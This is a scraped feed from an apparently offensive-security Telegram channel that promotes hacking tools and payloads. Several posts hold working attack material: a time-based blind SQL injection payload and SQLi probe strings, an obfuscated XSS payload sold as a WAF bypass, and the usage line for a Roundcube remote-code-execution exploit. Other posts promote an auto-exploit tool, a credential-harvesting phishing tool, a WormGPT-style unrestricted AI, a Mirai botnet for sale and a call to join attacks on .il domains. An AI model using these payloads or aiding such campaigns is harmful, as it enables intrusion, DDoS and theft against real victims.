Extracts URLs from OSINT Archives for Security Insights.
💬
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.
📊 Features:
⚪️ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
⚪️ Process multiple domains concurrently
⚪️ Filter results by file extensions or patterns
⚪️ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
⚪️ Multiple output formats (plain, JSON, CSV)
⚪️ Output to console or file
⚪️ Support for reading domains from stdin (pipeline integration)
⚪️ URL testing capabilities (status checking, link extraction)
🔼 Installation:
💻 Usage:
Github
⬇️ Download
🔒
#Osint #URL #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
💬
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.
📊 Features:
⚪️ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
⚪️ Process multiple domains concurrently
⚪️ Filter results by file extensions or patterns
⚪️ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
⚪️ Multiple output formats (plain, JSON, CSV)
⚪️ Output to console or file
⚪️ Support for reading domains from stdin (pipeline integration)
⚪️ URL testing capabilities (status checking, link extraction)
🔼 Installation:
cd urx
cargo build --release
💻 Usage:
# Scan a single domain
urx example.com
# Scan multiple domains
urx example.com example.org
# Scan domains from a file
cat domains.txt | urx
Github
⬇️ Download
🔒
BugCod3#Osint #URL #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤10👍5🔥2⚡1
CF-Hero
💬
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
📊 Feautures:
⚪️ DNS Reconnaissance
⚪️ Third-party Intelligence
⚪️ Advanced Features
🔼 Installation:
💻 Usage:
Github
⬇️ Download
🔒
#GO #Origin #IP #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
💬
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
📊 Feautures:
⚪️ DNS Reconnaissance
⚪️ Third-party Intelligence
⚪️ Advanced Features
🔼 Installation:
go install -v github.com/musana/cf-hero/cmd/cf-hero@latest
💻 Usage:
# The most basic running command. It checks A and TXT records by default.
cat domains.txt | cf-hero
# or you can pass "f" parameter to it.
cf-hero -f domains.txt
# Use the censys parameter to include Shodan in the scan
cat domain.txt | cf-hero -censys
# Use the shodan parameter to include Shodan in the scan
cat domain.txt | cf-hero -shodan
# Use the securitytrails parameter to include Shodan in the scan
cat domain.txt | cf-hero -securitytrails
Github
⬇️ Download
🔒
BugCod3#GO #Origin #IP #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤7⚡3👍2🔥2
Blind SQL Injection
Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
#BugBounty #Payload #SQLi
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
0'XOR(if(now()=sysdate(),sleep(10),0)) XOR'Z#BugBounty #Payload #SQLi
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤7🔥4⚡2
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥5❤3⚡1
This media is not supported in your browser
VIEW IN TELEGRAM
How to use Gobuster to brute-force directories!
$
dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
⬇️ Download
#GoBuster #Tips #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/Exploit_Forge
$
gobuster dir -u <target-URL> -w <wordlist>dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
⬇️ Download
#GoBuster #Tips #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/Exploit_Forge
🔥4❤3⚡1
WAF bypass for Akamai and Cloudflare
Payload:
#WAF #Akamai #Cloudflare
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>#WAF #Akamai #Cloudflare
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
1❤4⚡2🔥2
HacxGPT
The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.
🎯 Features:
⚪️ Powerful AI Conversations: all questions will be answered in goodflow.
⚪️ Broken AI: Can do anything you want !!
⚙️ Installation:
Github
⬇️ Download
🔒
#Ai #Hackers #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.
🎯 Features:
⚪️ Powerful AI Conversations: all questions will be answered in goodflow.
⚪️ Broken AI: Can do anything you want !!
⚙️ Installation:
sudo apt-get update; apt-get upgrade -y
sudo apt-get install git wget python3 -y
cd Hacx-GPT
pip install -r requirements.txt
python3 main.py
Github
⬇️ Download
🔒
BugCod3#Ai #Hackers #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤4🔥3⚡2
CVE-2025-49113 - Roundcube Remote Code Execution
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
💬 Denoscription:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
🏴☠️ Vulnerable Versions:
⚪️ 1.5.0 - 1.5.9
⚪️ 1.6.0 - 1.6.10
🖇 Requirements:
⚪️ PHP 7.0 or higher
⚪️ cURL extension enabled
⚪️ Target running a vulnerable version of Roundcube
💻 Usage:
🔼 Example:
Github
⬇️ Download
🔒
#CVE #PHP #RemoteCode
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
💬 Denoscription:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
🏴☠️ Vulnerable Versions:
⚪️ 1.5.0 - 1.5.9
⚪️ 1.6.0 - 1.6.10
🖇 Requirements:
⚪️ PHP 7.0 or higher
⚪️ cURL extension enabled
⚪️ Target running a vulnerable version of Roundcube
💻 Usage:
php CVE-2025-49113.php <url> <username> <password> <command>
🔼 Example:
php CVE-2025-49113.php http://localhost/roundcube/ admin password "id"
Github
⬇️ Download
🔒
BugCod3#CVE #PHP #RemoteCode
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
⚡4❤3🔥3
Hi 👋 , friends who want to help us in attacking the
T.me/BugCod3BOT
.il domain address can provide their type of help in the bot below and contact us.T.me/BugCod3BOT
5🔥8
BadMod auto exploit tool
💬 CMS auto detect and exploit.
💻 Installation:
Github
⬇️ Download
🔒
#PHP #Auto #Exploitation
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
💬 CMS auto detect and exploit.
💻 Installation:
chmod +x INSTALL
./INSTALL
Github
⬇️ Download
🔒
BugCod3#PHP #Auto #Exploitation
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤4🔥4⚡2
Trape (stable) v2.0
💬
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowledge, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
📊 Some benefits:
⚪️ LOCATOR OPTIMIZATION
⚪️ APPROACH
⚪️ REST API
⚪️ PROCESS HOOKS
⚪️ PUBLIC NETWORK TUNNEL
⚪️ CLICK ATTACK TO GET CREDENTIALS
⚪️ NETWORK
⚪️ PROFILE
💻 Usage:
Github
⬇️ Download
🔒
#Python #Osint #Security #Tracking #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
💬
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowledge, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
📊 Some benefits:
⚪️ LOCATOR OPTIMIZATION
⚪️ APPROACH
⚪️ REST API
⚪️ PROCESS HOOKS
⚪️ PUBLIC NETWORK TUNNEL
⚪️ CLICK ATTACK TO GET CREDENTIALS
⚪️ NETWORK
⚪️ PROFILE
💻 Usage:
cd trape
pip3 install -r requirements.txt
python3 trape.py -h
#Example: python3 trape.py --url http://example.com --port 8080
Github
⬇️ Download
🔒
BugCo3#Python #Osint #Security #Tracking #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥3❤2⚡1
GhostRecon
💬
GhostRecon is a passive reconnaissance tool used in cybersecurity and web penetration testing that automates the discovery of subdomains, IP addresses, and ASN (Autonomous System Number) information for a target domain. It leverages publicly available data sources and OSINT techniques to streamline the information gathering process. Additionally, it can identify active IP addresses and detect the presence of Content Delivery Networks (CDNs) and Web Application Firewalls (WAFs) to support security analysis.
📊 What Recon Tool Does:
⚪️ Find All Subdomains
⚪️ Find All URLs ASN
⚪️ Fetching IP
⚪️ Identify Live IPs
⚪️ Detect CDN/WAF
To Buy: T.me/BugCod3BOT
💬
GhostRecon is a passive reconnaissance tool used in cybersecurity and web penetration testing that automates the discovery of subdomains, IP addresses, and ASN (Autonomous System Number) information for a target domain. It leverages publicly available data sources and OSINT techniques to streamline the information gathering process. Additionally, it can identify active IP addresses and detect the presence of Content Delivery Networks (CDNs) and Web Application Firewalls (WAFs) to support security analysis.
📊 What Recon Tool Does:
⚪️ Find All Subdomains
⚪️ Find All URLs ASN
⚪️ Fetching IP
⚪️ Identify Live IPs
⚪️ Detect CDN/WAF
To Buy: T.me/BugCod3BOT
❤4🔥3⚡1
Mirai DDoS source with botnet and all tools and peripherals for sale, urgent sale
To Buy: T.me/BugCod3BOT
To Buy: T.me/BugCod3BOT
🔥7
RFC-compliant payloads for email and phone number fields
#RFC #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#RFC #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤4🔥4⚡2
Burp Suite MCP Server Extension with scan and crawl features
💬
This an extended MCP Server Extension for BurpSuite proxy with scan and crawl based on the original.
For Building instructions follow below the original README as provided from PortSwigger, for direct use, load the extension provided on your Burp proxy.
📊 Features:
⚪️ Connect Burp Suite to AI clients through MCP
⚪️ Automatic installation for Claude Desktop
⚪️ Comes with packaged Stdio MCP proxy server
💻 Usage:
⚪️ Install the extension in Burp Suite
⚪️ Configure your Burp MCP server in the extension settings
⚪️ Configure your MCP client to use the Burp SSE MCP server or stdio proxy
⚪️ Interact with Burp through your client!
🔼 Installation:
Prerequisites
⚪️ Java
⚪️ Jar Command
Github
⬇️ Download
🔒
#Burp #Suite #Extension
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
💬
This an extended MCP Server Extension for BurpSuite proxy with scan and crawl based on the original.
For Building instructions follow below the original README as provided from PortSwigger, for direct use, load the extension provided on your Burp proxy.
📊 Features:
⚪️ Connect Burp Suite to AI clients through MCP
⚪️ Automatic installation for Claude Desktop
⚪️ Comes with packaged Stdio MCP proxy server
💻 Usage:
⚪️ Install the extension in Burp Suite
⚪️ Configure your Burp MCP server in the extension settings
⚪️ Configure your MCP client to use the Burp SSE MCP server or stdio proxy
⚪️ Interact with Burp through your client!
🔼 Installation:
Prerequisites
⚪️ Java
⚪️ Jar Command
cd burp-mcp
./gradlew embedProxyJar
#Open Burp Suite
#Access the Extensions Tab
#Add the Extension
Github
⬇️ Download
🔒
BugCod3#Burp #Suite #Extension
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤6⚡4🔥1🤣1
Revelar – Origin Reveal PRO
🔹 Overview:
Revelar (Origin Reveal PRO) is a professional Go-based CLI tool for uncovering real/origin IP addresses of websites behind CDNs such as Cloudflare, Akamai, Fastly, Imperva, and AWS CloudFront.
⚙️ Features:
▫️ Detects CDN providers automatically.
▫️ Collects DNS records (A, AAAA, MX, Reverse DNS).
▫️ Extracts SSL Subject Alternative Names (SANs).
▫️ Integrates with optional external tools (
▫️ Filters CDN IP ranges to isolate real origin candidates.
▫️ Active verification engine
📥 Installation:
Install via go install:
or
💻 Usage:
Github
⬇️ Download
🔒
#Revelar #CDN #Finder #RealIP #Discovery #Tool
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/Exploit_Forge
🔹 Overview:
Revelar (Origin Reveal PRO) is a professional Go-based CLI tool for uncovering real/origin IP addresses of websites behind CDNs such as Cloudflare, Akamai, Fastly, Imperva, and AWS CloudFront.
⚙️ Features:
▫️ Detects CDN providers automatically.
▫️ Collects DNS records (A, AAAA, MX, Reverse DNS).
▫️ Extracts SSL Subject Alternative Names (SANs).
▫️ Integrates with optional external tools (
subfinder, amass, dnsx, httpx, nuclei).▫️ Filters CDN IP ranges to isolate real origin candidates.
▫️ Active verification engine
📥 Installation:
Install via go install:
go install github.com/MRvirusIR/Revelar@latest
or
cd Revelar
./Revelar -d example.com #For Run
💻 Usage:
./Revelar -h
Github
⬇️ Download
🔒
BugCod3#Revelar #CDN #Finder #RealIP #Discovery #Tool
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/Exploit_Forge
❤7⚡3🔥3🏆1
If this post gets support and a lot of reactions, we will prepare and create many more cool tools for you to use and enjoy. 🔥
🔥12❤2